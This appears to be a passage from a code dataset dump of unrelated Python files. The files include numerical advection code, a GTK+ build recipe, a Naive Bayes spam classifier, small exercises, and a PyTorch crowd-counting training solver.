app.run(debug=True)\n","sub_path":"Session01/Homework/Bai2/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"206856296","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n\"\"\"\n###Packages###\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.linalg\nimport scipy.special\n\nfrom mpl_toolkits.mplot3d import axes3d\nfrom matplotlib.collections import PolyCollection\nfrom matplotlib.colors import colorConverter\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib.collections import LineCollection\nimport numpy as np # External library for numerical calculations\nimport matplotlib.pyplot as plt # Plotting library\nfrom matplotlib import animation\nfrom matplotlib import cm\nfrom matplotlib.ticker import LinearLocator, FormatStrFormatter\nplt.style.use('classic')\nimport time\n \n\n\nclass VectorCreate():\n def __init__(self, name, array):\n self.name = name\n self.array = array\n \n def adding_ammount(self, amount):\n self.array += amount\n \n def ic(self):\n self.array = np.exp(- 100*(self.array-1/4)**2 )\n \n def print_array(self):\n print(self.array)\n \n def plot_array(self):\n plt.plot(self.array)\n plt.show()\n \n def plot_array_clear(self):\n plt.ylim(-0.1, 1)\n plt.plot(self.array)\n plt.draw()\n plt.pause(0.001)\n plt.clf()\n \n def FE(self):\n nx = len(self.array)\n for j in range(0,nx): \n self.array[j] = self.array[j] - 0.5*(self.array[j] - self.array[(j-1)%nx])\n \n def FE_eff(self):\n nx ,ny = self.array.shape\n self.array = self.array - 0.5*(self.array - np.roll(self.array,1)) \n \n \n \n \n \n \n \n \n##########********. 2D *********############ \n\n\n\n\n\n\n \ndef upstream_flux(m,p,c):\n return 0.5*( p*(c-abs(c)) + m*(c+abs(c)) )\n\nclass Psi2dCreate():\n def __init__(self, name, array, X, Y):\n self.name = name\n self.array = array\n self.X = X\n self.Y = Y\n \n def ic2d(self):\n self.array = np.exp(- ( (self.X-1/4)**2+(self.Y-1/4)**2 ) /0.01)\n \n \n def FE_2D(self,Upxfield,Upyfield):\n \n nx = len(Upxfield)\n ny = len(Upxfield)\n\n upx = np.zeros([ny,nx])\n upy = np.zeros([ny,nx])\n for j in range(0,ny):\n for i in range(0,nx):\n upy[j,i] = upstream_flux(self.array[(j),i],self.array[(j+1)%ny,i],Upyfield[j,i])\n upx[j,i] = upstream_flux(self.array[j,(i)],self.array[j,(i+1)%nx],Upxfield[j,i])\n \n self.array[j,i] = self.array[j,i] - 1*(upy[(j),i] - upy[(j-1)%ny,i] ) - 1*( upx[j,(i)] - upx[j,(i-1)%nx] )\n \n def plot_array_clear(self):\n plt.ylim(-0.1, 1)\n plt.plot(self.array)\n plt.draw()\n plt.pause(0.001)\n plt.clf()\n \n \nclass MatrixClass():\n def __init__(self,name,M):\n self.name = name\n self.M= M\n \n \nclass Matrix_storage_Bank():\n def __init__(self,name,psvelx,psvely,fx,fy,psiprime,psiprimeprime,beta,Upxfield,Upyfield,upx,upy):\n self.name = name\n self.psvelx = psvelx\n self.psvely = psvely\n self.fx = fx \n self.fy = fy\n self.psiprime = psiprime\n self.psiprimeprime = psiprimeprime\n self.beta = beta\n self.Upxfield = Upxfield\n self.Upyfield = Upyfield\n self.upx = upx\n self.upy = upy\n \ndef __main__():\n xmin = 0; xmax = 1; tmin =0; tmax = 10; nx = 101; nt = 101;\n x = np.linspace(xmin,xmax,nx)\n p = np.linspace(xmin,xmax,nx)\n pp = VectorCreate(\"pp\", p)\n pp.ic()\n xx = VectorCreate(\"xx\", x)\n xx.adding_ammount(pp.array) ## this adds one as the function above has done\n \n fig , ax = plt.subplots()\n \n for t in range(0,nt):\n start = time.time()\n pp.FE_eff() \n end = time.time()\n print(end - start) \n #pp.plot_array_clear()\n plt.clf()\n \ndef __main2d__():\n \n xmin = -1;xmax =1; ymin =-1;ymax =1;\n dx = 0.1; dy =0.1; a =1; dt = 0.05; tmax = 10;\n\n x = np.arange(xmin,xmax,dx)\n y = np.arange(ymin,ymax,dy)\n nx = round((xmax - xmin )/dx)\n ny = round((ymax - ymin )/dy)\n c_1 = dt/dx*a\n c_2 = dt/dx*a\n print(c_1+c_2,'=c_1+c_2')\n \n X, Y = np.meshgrid(x, y)\n psistructure = np.zeros([ny,nx])\n psi = Psi2dCreate(\"psi\",psistructure,X,Y)\n psi.ic2d()\n \n \n fig = plt.figure(1)\n ax = fig.gca(projection='3d')\n surf = ax.plot_wireframe(X,Y,psi.array,cmap=cm.coolwarm)\n ax.set_zlabel('Z')\n ax.set_zlim(-0.1, 0.5)\n U = MatrixClass(\"U\",Y)\n V = MatrixClass(\"U\",-X)\n Upxfield = np.zeros([ny,nx])\n Upyfield = np.zeros([ny,nx])\n for j in range(0,ny):\n for i in range(0,nx):\n ##this is the first pass\n Upxfield[j,i] = c_1*0.5*(U.M[j,(i+1)%nx]+U.M[j,i])\n Upyfield[j,i] = c_2*0.5*(V.M[(j+1)%ny,i]+V.M[j,i] )\n fig, ax = plt.subplots()\n q = ax.quiver(x, y, U.M, V.M)\n plt.show() \n \n t=0;tmax=1;\n while(t\n\nt.days\n# 4\n\nt.seconds\n# 36000\n\nt.hours\n# Traceback (most recent call last):\n# File \"\", line 1, in \n# AttributeError: 'datetime.timedelta' object has no attribute\n\nt.seconds / 60 / 60\n# 10.0\n\nt.seconds / 3600\n# 10.0\n\n# # # # # # # # # # # # # #\n\neta = timedelta(hours=6)\n\ntoday = datetime.today()\n\ntoday\n# datetime.datetime(2019, 1, 1, 18, 37, 59, 638263)\n\neta\n# datetime.timedelta(0, 21600)\n\ntoday + eta\n# datetime.datetime(2019, 1, 2, 0, 37, 59, 638263)\n\nstr(today + eta)\n# '2019-01-02 00:37:59.638263'\n\n\n\n","sub_path":"days/01-03-datetimes/datetime_timedelta.py","file_name":"datetime_timedelta.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"213784039","text":"class GtkPackage (GnomeXzPackage):\n\tdef __init__ (self):\n\t\tGnomeXzPackage.__init__ (self, 'gtk+', version_major = '3.16', version_minor = '3',\n\t\t\tconfigure_flags = [\n\t\t\t\t'--with-gdktarget=quartz',\n\t\t\t\t'--enable-quartz-backend',\n\t\t\t\t'--enable-debug',\n\t\t\t\t'--enable-static',\n\t\t\t\t'--disable-glibtest',\n\t\t\t\t'--disable-introspection',\n\t\t\t\t'--disable-cloudprint',\n\t\t\t\t'--disable-wayland-backend',\n\t\t\t\t'--disable-schemas-compile',\n\t\t\t\t'--disable-installed-tests',\n\t\t\t\t'gio_can_sniff=yes'\n\t\t\t]\n\t\t)\n\t\tself.gdk_target = 'quartz'\n \n\t\tif Package.profile.name == 'darwin':\n\t\t\tself.gdk_target = 'quartz'\n\t\t\tself.sources.extend ([\n\t\t\t\t# Custom gtkrc\n\t\t\t\t'patches/gtkrc'\n\t\t\t])\n \n\t\tif Package.profile.name == 'darwin' and not Package.profile.m64:\n\t\t\tself.configure_flags.extend ([\n\t\t\t\t# fix build on lion, it uses 64-bit host even with -m32\n\t\t\t\t'--build=i386-apple-darwin11.2.0',\n\t\t\t])\n \n \n\tdef prep (self):\n\t\tPackage.prep (self)\n\t\tif Package.profile.name == 'darwin':\n\t\t\tfor p in range (2, len (self.sources)):\n\t\t\t\tself.sh ('patch -p1 --ignore-whitespace < \"%{sources[' + str (p) + ']}\"')\n \n\tdef arch_build (self, arch):\n \n\t\tif arch == 'darwin-32':\n\t\t\t\tself.sh ('export CC=\"$CC -arch i386\"')\n\t\t\t\tself.sh ('export CXX=\"$CXX -arch i386\"')\n\t\t\t\tself.local_ld_flags = ['-arch i386', '-DX_LOCALE']\n\t\t\t\tself.local_gcc_flags = ['-arch i386', '-fstrict-aliasing']\n\t\telif arch == 'darwin-64':\n\t\t\t\tself.sh ('export CC=\"$CC -arch x86_64\"')\n\t\t\t\tself.sh ('export CXX=\"$CXX -arch x86_64\"')\n\t\t\t\tself.local_ld_flags = ['-arch x86_64', '-DX_LOCALE']\n\t\t\t\tself.local_gcc_flags = ['-arch x86_64', '-fstrict-aliasing']\n \n\t\tPackage.arch_build (self, arch, defaults = False)\n \n\tdef install(self):\n\t\tPackage.install(self)\n\t\tif Package.profile.name == 'darwin':\n\t\t\tself.install_gtkrc ()\n \n\tdef install_gtkrc(self):\n\t\tgtkrc = self.sources[1]\n\t\torigin = gtkrc if os.path.isabs (gtkrc) else os.path.join (self.package_dir (), gtkrc)\n\t\tdestdir = os.path.join (self.prefix, \"etc\", \"gtk-2.0\")\n\t\tif not os.path.exists (destdir):\n\t\t\tos.makedirs(destdir)\n\t\tself.sh('cp %s %s' % (origin, destdir))\n \nGtkPackage ()\n","sub_path":"packages/gtk+3.py","file_name":"gtk+3.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"456993868","text":" # -*- coding: utf-8 -*-\n\n\"\"\"\nCreated on Sat May 26 18:19:58 2018\n\n@author: Harini Gowdagere Tulasidas \nPSU ID: 950961342\n@Course : CS 545- Machine Learning\nProgramming Assignment2: Gaussian Naïve Bayes and Logistic Regression to classify \nthe Spambase data from the UCI ML repository\n\"\"\"\nfrom __future__ import division\nimport numpy as np\nimport pandas as pd\n\nfrom sklearn.metrics import confusion_matrix as cm\nfrom sklearn.metrics import recall_score as recall\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import precision_score\n\n\n\"\"\" This method splits the dataset such that the test and train data has 2300 instances each \nthe there are 40% spam and 60% no spam instances.\"\"\"\n\ndef test_train_split():\n filename = \"/Users/harinirahul/Desktop/CS - 545 - ML/PA2/spambase/spambase.data\" \n dataset = np.array(pd.read_csv(filename))\n temp = np.split(dataset, np.where(np.diff(dataset[:,-1]))[0]+1)\n \n spam = temp[0] \n no_spam = temp[1]\n np.random.shuffle(spam)\n np.random.shuffle(no_spam)\n spam_size = int((len(spam)/2))\n no_spam_size = int((len(no_spam)/2))\n\n train_data = np.concatenate((spam[: spam_size, :],no_spam[:no_spam_size,:]), axis =0) \n test_data = np.concatenate((spam[spam_size: , :],no_spam[no_spam_size:,:]), axis =0)\n \n train_labels = train_data[:,-1]\n train_labels = train_labels.reshape((len(train_labels),1))\n \n test_labels = test_data[:,-1]\n test_labels = test_labels.reshape((len(test_labels),1))\n \n return train_data,train_labels,test_data,test_labels\n\n\"\"\"This is a utility method that computes mean and standard deviation for the features.\nIt also replaces the Standard deviation with minimum value of 0.0001 when it is 0. This is done\nto avoid the errors while computing the log \"\"\"\n\ndef mean_and_sd(data):\n x_mean = np.array(np.mean(data , axis = 0))\n x_std = np.array(np.std(data , axis = 0))\n x_std[x_std == 0.0] = 0.0001\n \n return x_mean.reshape((len(x_mean),1)) ,x_std.reshape((len(x_std),1))\n\n\"\"\"\nThis method is used to calculate the prior probabilities for both the spam and Non spam classes.\n\"\"\"\ndef calculate_probabilities(dataset):\n no_spam_count = 0 \n spam_count = 0\n no_spam = []\n spam = []\n for row in dataset:\n if row[-1]==1:\n spam_count+=1\n spam.append(row) \n else:\n no_spam_count+=1\n no_spam.append(row)\n \n no_spam_prior = float(no_spam_count/len(dataset))\n spam_prior = float(spam_count/len(dataset)) \n print(\"prior Probability of the spam class: \" ,spam_prior , \"\\n Prior probability of Non Spam class :\", no_spam_prior)\n log_spam_prior = np.log(spam_prior) \n log_no_spam_prior = np.log(no_spam_prior) \n \n spam = np.array(spam)\n no_spam = np.array(no_spam) \n \n spam_x_mean , spam_x_std = mean_and_sd(spam[: , :57])\n no_spam_x_mean , no_spam_x_std = mean_and_sd(no_spam[:,:57])\n return log_spam_prior , log_no_spam_prior , spam_x_mean , spam_x_std,no_spam_x_mean , no_spam_x_std \n\n\n\"\"\" This method is used to compute the probabilities for the Gaussian Naive Bayes algorithm\nand classifies the instance as spam and non spam \"\"\"\ndef gaussian_naive_bayes_classifier(log_spam_prior , log_no_spam_prior , spam_x_mean , spam_x_std ,no_spam_x_mean , no_spam_x_std,row):\n \n p_xi_cj_spam=(1/(np.sqrt(2*np.pi) * spam_x_std))*np.exp((-1)* (((row-spam_x_mean)**2)/(2*(spam_x_std**2))))\n p_xi_cj_no_spam = (1/(np.sqrt(2*np.pi) * no_spam_x_std))*np.exp((-1)* (((row-no_spam_x_mean)**2)/(2*(no_spam_x_std**2))))\n \"\"\"Normalizing the Gaussian Naive Bayes probablities \"\"\"\n p_xi_cj_spam[p_xi_cj_spam == 0.0] = 0.0001\n p_xi_cj_no_spam[p_xi_cj_no_spam == 0.0] = 0.0001\n \n log_naive_spam = np.sum(np.log(p_xi_cj_spam)) \n log_naive_no_spam = np.sum(np.log(p_xi_cj_no_spam))\n \n no_spam_val = log_naive_no_spam+log_no_spam_prior \n spam_val = log_naive_spam+log_spam_prior\n \n return np.argmax([no_spam_val ,spam_val ]) \n\n\"\"\"This method has the final predictions of the Gaussian Naive Bayes Classifier for the dataset. \"\"\"\ndef predict(train_data,test_data):\n \n log_spam_prior , log_no_spam_prior , spam_x_mean , spam_x_std ,no_spam_x_mean , no_spam_x_std = calculate_probabilities(train_data)\n predicted_output = []\n for row in test_data:\n row = row.reshape((len(row),1))\n predicted_output.append(gaussian_naive_bayes_classifier\n (log_spam_prior , log_no_spam_prior ,\n spam_x_mean , spam_x_std ,no_spam_x_mean , no_spam_x_std,row))\n return predicted_output\n\n\"\"\"The main method gets the predictions of the classifier and computes the various metrics\nsuch as recall , accuracy and precision and also computes the confusion matrix \"\"\"\n\ndef main():\n train_data,train_labels,test_data,test_labels = test_train_split()\n predicted_output = predict(train_data,test_data[:,:57]) \n print(\"confusion matrix : \\n\" ,cm(test_labels,predicted_output))\n print(\"Recall : \",recall(test_labels,predicted_output))\n print(\"Accuracy:\" , accuracy_score(test_labels,predicted_output)*100 , \"%\" )\n print(\"precision : \",precision_score(test_labels,predicted_output))\n \n \nif __name__== \"__main__\":\n main()\n \n \n\n \n \n \n\n\n","sub_path":"NaiveBayes.py","file_name":"NaiveBayes.py","file_ext":"py","file_size_in_byte":5355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"257211087","text":"import baconator\nimport proverb \nimport html\nfrom os import system, name \n\ndef strip_tags(s):\n tag = False\n quote = False\n out = \"\"\n\n for c in s:\n if c == '<' and not quote:\n tag = True\n elif c == '>' and not quote:\n tag = False\n elif (c == '\"' or c == \"'\") and tag:\n quote = not quote\n elif not tag:\n out = out + c\n\n return out\n\nsystem('cls') \n\nname = baconator.generate(delimiter=' ', token_len=0) \nprint(\"Hello, your Hollywood generated name is: \" + name)\nprint() \n\nprint(\"Your proverb today, \" + name + \", is ... \")\nprint(strip_tags(proverb.saying()))\nprint()\n\ninput(\"Press any key to continue.\")\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"393588849","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def removeNthFromEnd(self, head, n):\n \"\"\"\n :type head: ListNode\n :type n: int\n :rtype: ListNode\n \"\"\"\n header=ListNode(0)\n header.next=head #记录头\n p1=p2=header\n for i in range(n):p1=p1.next\n while p1.next:\n p1=p1.next\n p2=p2.next\n p2.next=p2.next.next\n return header.next","sub_path":"019.py","file_name":"019.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"625186984","text":"#This program prints out a random fruit\n#author: Carolyn Moorhouse\n\nimport random\n\nfruits = ('Apple', 'Orange', 'Banana', 'Pear', 'Lemon', 'Melon')\n\n#we want a random number between 0 and length-1\n\nindex = random.randint(0, len(fruits)-1)\n\nfruit = fruits[index]\nprint(\"A Random Fruit: {}\".format(fruit))\n","sub_path":"Week03/lab2.3.randomFruit2.py","file_name":"lab2.3.randomFruit2.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"408048437","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# @Time : 2018/8/28 下午4:03 \n# @Author : ComeOnJian \n# @File : data_analy.py\n\nimport pandas as pd\nimport numpy as np\nimport pickle\nfrom collections import defaultdict\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom gensim.models import word2vec\nfrom gensim.models import KeyedVectors\n\n\n# text process\ndef make_vocab(data_se):\n \"\"\"\n :param data_se: list\n \"\"\"\n dict_fre_word = defaultdict(int)\n dict_id2label_word = {}\n dict_label2id_word = {}\n lengths = []\n word_index = 0\n for index in range(len(data_se)):\n # split\n art_splits = data_se[index].split()\n lengths.append(len(art_splits))\n # count\n for word in art_splits:\n dict_fre_word[word] += 1\n if word not in dict_label2id_word:\n dict_id2label_word[word_index] = word\n dict_label2id_word[word] = word_index\n word_index += 1\n\n return dict_fre_word, dict_id2label_word, dict_label2id_word, lengths\n\ndef prune(data, docs, min_df, max_d):\n \"\"\"\n :param docs: (pd.Series) document\n :param min_df: 最小频率(int)\n :param max_df: 最大不超过(float,0.0 bigCount:\n bigCount = count\n bigWord = word\n\nprint(bigWord, bigCount)","sub_path":"python/dict.py","file_name":"dict.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"552559224","text":"from PIL import Image\n\nimport scipy.io as sio\nfrom numpy.testing import rand\n\n\ndef get():\n datadict = sio.loadmat('data/test_32x32.mat')\n y = datadict['y'].reshape(datadict['y'].shape[0], )\n return datadict['X'].transpose((3, 0, 1, 2)), y\n\nif __name__==\"__main__\":\n X,Y = get()\n for data in X[0:2]:\n img = Image.fromarray(data, 'RGB')\n img.save('my'+str(rand(0))+'.png')\n print(Y[0])\n img.show()","sub_path":"img_conversion_spike.py","file_name":"img_conversion_spike.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"467733040","text":"from tool.config import opt\r\nfrom tool.Meter import AverageMeter, Meter\r\nfrom tool import trans, myLoss\r\nfrom tensorboardX import SummaryWriter\r\nfrom tool.mynms import localmax\r\nfrom tool.eval import eval_acc\r\nfrom tool import vis\r\nimport numpy as np\r\nimport torch\r\nfrom tool.Loader import deNormalize\r\nimport torch.nn as nn\r\nfrom torch.nn import functional as F\r\n\r\n\r\nclass SolverMask(object):\r\n def __init__(self, net, loader, model='train'):\r\n self.net = net\r\n self.writer = SummaryWriter(opt.logdir)\r\n self.model = model\r\n self.scale = 10\r\n # self.loader = loader\r\n if self.model == 'train':\r\n self.epoch = 0\r\n self.vis_fre = opt.vis_fre\r\n self.val_freq = opt.val_freq\r\n self.val_dense_start = opt.val_dense_start\r\n self.lr_decay_start = opt.lr_decay_start\r\n self.max_epoch = opt.max_epoch\r\n self.train_loader, self.val_loader = loader\r\n if opt.optimizer == 'Adam':\r\n self.optimizer = torch.optim.Adam(net.parameters(), lr=opt.lr, weight_decay=opt.weight_decay)\r\n elif opt.optimizer == 'SGD':\r\n self.optimizer = torch.optim.SGD(net.parameters(), lr=opt.lr, weight_decay=opt.weight_decay,\r\n momentum=opt.momentum)\r\n else:\r\n self.optimizer = None\r\n print('optimizer error')\r\n self.scheduler = torch.optim.lr_scheduler.StepLR(self.optimizer, step_size=opt.num_epoch_lr_decay,\r\n gamma=opt.lr_decay)\r\n self.record = {'best_mae': 1e20, 'best_mse': 1e20, 'pca': 0, 'gac': 0}\r\n self.best_ckpt_dir = opt.best_ckpt_dir\r\n self.loss2 = nn.MSELoss(reduction='mean')\r\n self.loss_mask = nn.NLLLoss(reduction='mean')\r\n self.writer.add_graph(self.net, input_to_model=torch.randn(1, 3, 240, 240).cuda())\r\n # loss = F.nll_loss(torch.log(mask), target, reduction='mean')\r\n if opt.reuse:\r\n self.load_model(path=opt.reuse_model)\r\n elif self.model == 'test':\r\n self.test_loader = loader\r\n self.load_model(opt.best_ckpt)\r\n\r\n def forward(self):\r\n for epoch in range(self.epoch, self.max_epoch):\r\n self.epoch += 1\r\n self.train()\r\n if self.epoch % self.val_freq == 0 or self.epoch > self.val_dense_start:\r\n self.val()\r\n if self.epoch % opt.num_epoch_lr_decay == 0:\r\n self.scheduler.step()\r\n self.writer.close()\r\n\r\n def train(self):\r\n self.net.train()\r\n mae_meter, mse_meter = AverageMeter(), AverageMeter()\r\n loss1_meter, loss2_meter, loss_meter = AverageMeter(), AverageMeter(), AverageMeter()\r\n cors_meter = Meter()\r\n\r\n print(\"开始第{}次训练\".format(self.epoch))\r\n for index, sample in enumerate(self.train_loader):\r\n # 输入图像和真实标签\r\n imgs = trans.tovariable(sample['image'])\r\n gt_denses = trans.tovariable(sample['dense']) * self.scale\r\n gt_masks = trans.tovariable(sample['mask']) # [N, H, W]\r\n # 预测标签\r\n pre_masks, pre_denses = self.net(imgs) # shape[N, 2, H, W]\r\n # 计算损失\r\n # print(pre_masks.shape, gt_masks.shape)\r\n # print(pre_denses.shape, gt_denses.shape)\r\n loss_mask = self.loss_mask(torch.log(pre_masks), gt_masks)\r\n loss_mse = self.loss2(pre_denses, gt_denses)\r\n loss = loss_mask + loss_mse\r\n\r\n loss1_meter.update(loss_mask)\r\n loss2_meter.update(loss_mse)\r\n loss_meter.update(loss)\r\n print('loss_mask:{}, loss_mse:{}, loss:{}'.format(loss_mask.data, loss_mse.data, loss.data))\r\n\r\n self.optimizer.zero_grad()\r\n loss.backward()\r\n self.optimizer.step()\r\n pre_masks = F.softmax(pre_masks, dim=1)\r\n pre_masks[pre_masks >= 0.5] = 1\r\n pre_masks[pre_masks < 0.5] = 0\r\n\r\n pre_denses = trans.tonumpy(pre_denses) / self.scale\r\n pre_masks = trans.tonumpy(pre_masks)\r\n gt_denses = trans.tonumpy(gt_denses) / self.scale\r\n gt_masks = trans.tonumpy(gt_masks)\r\n gt_masks = gt_masks[:, np.newaxis, :, :]\r\n # 预测位置和分数\r\n\r\n my_n_cors = localmax(pre_denses)\r\n # 真实位置和分数\r\n n_cors = localmax(gt_denses)\r\n\r\n for idx in range(len(my_n_cors)):\r\n error = len(my_n_cors[idx]) - len(n_cors[idx])\r\n mae_meter.update(np.abs(error))\r\n mse_meter.update(np.square(error))\r\n\r\n # 位置评测指标\r\n g_count, a_count, p_count = eval_acc(n_cors, my_n_cors, s=8)\r\n cors_meter.update(a_count, p_count, g_count)\r\n\r\n if self.epoch % self.vis_fre == 0:\r\n vis.vis(self.writer, pre_denses[0, 0], gt_denses[0, 0], self.epoch, model='train', mode='den')\r\n vis.vis(self.writer, pre_masks[0, 1], gt_masks[0, 0], self.epoch, model='train', mode='mask')\r\n\r\n # np.savetxt(opt.result + 'train_map/' + path + str(epoch + 1) + '_' + str(index + 1) + 'pre.csv',\r\n # np_mydenses[0, 0, :, :], fmt='%.4f', delimiter=',')\r\n self.writer.add_scalar('train_loss1', loss1_meter.avg, self.epoch)\r\n self.writer.add_scalar('train_loss2', loss2_meter.avg, self.epoch)\r\n self.writer.add_scalar('train_loss', loss_meter.avg, self.epoch)\r\n self.writer.add_scalar('train_mae', mae_meter.avg, self.epoch)\r\n self.writer.add_scalar('train_mse', np.sqrt(mse_meter.avg), self.epoch)\r\n self.writer.add_scalar('train_gca', cors_meter.get_gca(), self.epoch)\r\n self.writer.add_scalar('train_pca', cors_meter.get_pca(), self.epoch)\r\n print('训练epoch:{}, mae:{}, mse:{}, gca{}, pac{}'.format(self.epoch, mae_meter.avg, np.sqrt(mse_meter.avg),\r\n round(cors_meter.get_gca(), 2),\r\n round(cors_meter.get_pca(), 2)))\r\n print('正确人数:{}, 预测人数:{}, 实际人数:{}, 平均损失:{}'.format(cors_meter.a_count, cors_meter.p_count,\r\n cors_meter.g_count, loss_meter.avg))\r\n\r\n def val(self):\r\n self.net.eval()\r\n mae_meter, mse_meter = AverageMeter(), AverageMeter()\r\n loss1_meter, loss2_meter, loss_meter = AverageMeter(), AverageMeter(), AverageMeter()\r\n cors_meter = Meter()\r\n print(\"开始第{}次交叉\".format(self.epoch))\r\n for index, sample in enumerate(self.val_loader):\r\n with torch.no_grad():\r\n # 输入图像和真实标签\r\n imgs = trans.tovariable(sample['image'])\r\n gt_denses = trans.tovariable(sample['dense']) * self.scale\r\n gt_masks = trans.tovariable(sample['mask']) # [N, 1, H, W]\r\n\r\n # 预测标签\r\n pre_masks, pre_denses = self.net(imgs) # shape[N, 2, H, W]\r\n # 计算损失\r\n loss_mask = self.loss_mask(torch.log(pre_masks), gt_masks)\r\n loss_mse = self.loss2(pre_denses, gt_denses)\r\n loss = loss_mask + loss_mse\r\n\r\n loss1_meter.update(loss_mask)\r\n loss2_meter.update(loss_mse)\r\n loss_meter.update(loss)\r\n print('loss_mask:{}, loss_mse:{}, loss:{}'.format(loss_mask.data, loss_mse.data, loss.data))\r\n\r\n pre_masks = F.softmax(pre_masks, dim=1)\r\n pre_masks[pre_masks >= 0.5] = 1\r\n pre_masks[pre_masks < 0.5] = 0\r\n\r\n pre_denses = trans.tonumpy(pre_denses) / self.scale\r\n pre_masks = trans.tonumpy(pre_masks)\r\n gt_denses = trans.tonumpy(gt_denses) / self.scale\r\n gt_masks = trans.tonumpy(gt_masks)\r\n gt_masks = gt_masks[:, np.newaxis, :, :]\r\n # 预测位置和分数\r\n my_n_cors = localmax(pre_denses)\r\n # 真实位置和分数\r\n n_cors = localmax(gt_denses)\r\n\r\n for idx in range(len(my_n_cors)):\r\n error = len(my_n_cors[idx]) - len(n_cors[idx])\r\n mae_meter.update(np.abs(error))\r\n mse_meter.update(np.square(error))\r\n\r\n # 位置评测指标\r\n g_count, a_count, p_count = eval_acc(n_cors, my_n_cors, s=8)\r\n cors_meter.update(a_count, p_count, g_count)\r\n\r\n if self.epoch % self.vis_fre == 0:\r\n vis.vis(self.writer, pre_denses[0, 0], gt_denses[0, 0], self.epoch, model='val', mode='den')\r\n vis.vis(self.writer, pre_masks[0, 1], gt_masks[0, 0], self.epoch, model='val', mode='mask')\r\n if mae_meter.avg < self.record['best_mae']:\r\n self.record['best_mae'] = mae_meter.avg\r\n self.record['best_mse'] = np.sqrt(mse_meter.avg)\r\n self.record['pca'] = cors_meter.get_pca()\r\n self.record['gca'] = cors_meter.get_gca()\r\n self.save_model()\r\n self.writer.add_scalar('val_loss1', loss1_meter.avg, self.epoch)\r\n self.writer.add_scalar('val_loss2', loss2_meter.avg, self.epoch)\r\n self.writer.add_scalar('val_loss', loss_meter.avg, self.epoch)\r\n self.writer.add_scalar('val_mae', mae_meter.avg, self.epoch)\r\n self.writer.add_scalar('val_mse', np.sqrt(mse_meter.avg), self.epoch)\r\n self.writer.add_scalar('val_gca', cors_meter.get_gca(), self.epoch)\r\n self.writer.add_scalar('val_pca', cors_meter.get_pca(), self.epoch)\r\n print('交叉epoch:{}, mae:{}, mse:{}, gca{}, pac{}'.format(self.epoch, mae_meter.avg, np.sqrt(mse_meter.avg),\r\n round(cors_meter.get_gca(), 2),\r\n round(cors_meter.get_pca(), 2)))\r\n print('正确人数:{}, 预测人数:{}, 实际人数:{}, 平均损失:{}'.format(cors_meter.a_count, cors_meter.p_count,\r\n cors_meter.g_count, loss_meter.avg))\r\n\r\n def test(self):\r\n self.net.eval()\r\n mae_meter, mse_meter = AverageMeter(), AverageMeter()\r\n cors_meter = Meter()\r\n for index, sample in enumerate(self.test_loader):\r\n with torch.no_grad():\r\n # 输入图像和真实标签\r\n imgs = trans.tovariable(sample['image'])\r\n gt_denses = trans.tovariable(sample['dense']) * self.scale\r\n\r\n # 预测标签\r\n pre_denses = self.net(imgs) # shape[N, 1, H, W]\r\n\r\n pre_denses = trans.tonumpy(pre_denses) / self.scale\r\n gt_denses = trans.tonumpy(gt_denses) / self.scale\r\n\r\n # 预测位置和分数\r\n my_n_cors = localmax(pre_denses)\r\n # 真实位置和分数\r\n n_cors = localmax(gt_denses)\r\n\r\n my_munbers = [len(my_n_cors[idx]) for idx in range(len(my_n_cors))]\r\n numbers = [len(n_cors[idx]) for idx in range(len(n_cors))]\r\n print('预测人数:{}'.format(my_munbers))\r\n print('实际人数:{}'.format(numbers))\r\n\r\n imgs = deNormalize(np.array(imgs.cpu()))\r\n for idx in range(len(my_n_cors)):\r\n error = len(my_n_cors[idx]) - len(n_cors[idx])\r\n mae_meter.update(np.abs(error))\r\n mse_meter.update(np.square(error))\r\n np.savetxt(opt.result + 'test_map/' + str(index) + '_' + str(idx) + 'pre.csv', pre_denses[idx, 0],\r\n fmt='%.4f', delimiter=',')\r\n vis.vis_imgCor(imgs[idx], my_n_cors[idx], n_cors[idx],\r\n path=opt.result + 'test_img/' + str(index) + '_' + str(idx) + 'pre.png')\r\n\r\n # 位置评测指标\r\n g_count, a_count, p_count = eval_acc(n_cors, my_n_cors, s=8)\r\n cors_meter.update(a_count, p_count, g_count)\r\n print('mae:{}, mse:{}, gca{}, pac{}'.format(mae_meter.avg, np.sqrt(mse_meter.avg),\r\n round(cors_meter.get_gca(), 2),\r\n round(cors_meter.get_pca(), 2)))\r\n print('正确人数:{}, 预测人数:{}, 实际人数:{}'.format(cors_meter.a_count, cors_meter.p_count, cors_meter.g_count))\r\n\r\n def save_model(self):\r\n name = self.best_ckpt_dir + str(self.epoch) + '_' + str(round(self.record['best_mae'], 2)) + '_' + \\\r\n str(round(self.record['best_mse'], 2)) + '_' + str(round(self.record['pca'], 2)) + '_' + \\\r\n str(round(self.record['gca'], 2)) + '.pth'\r\n best_state = {\r\n 'record': self.record, 'net': self.net.state_dict(), 'optimizer': 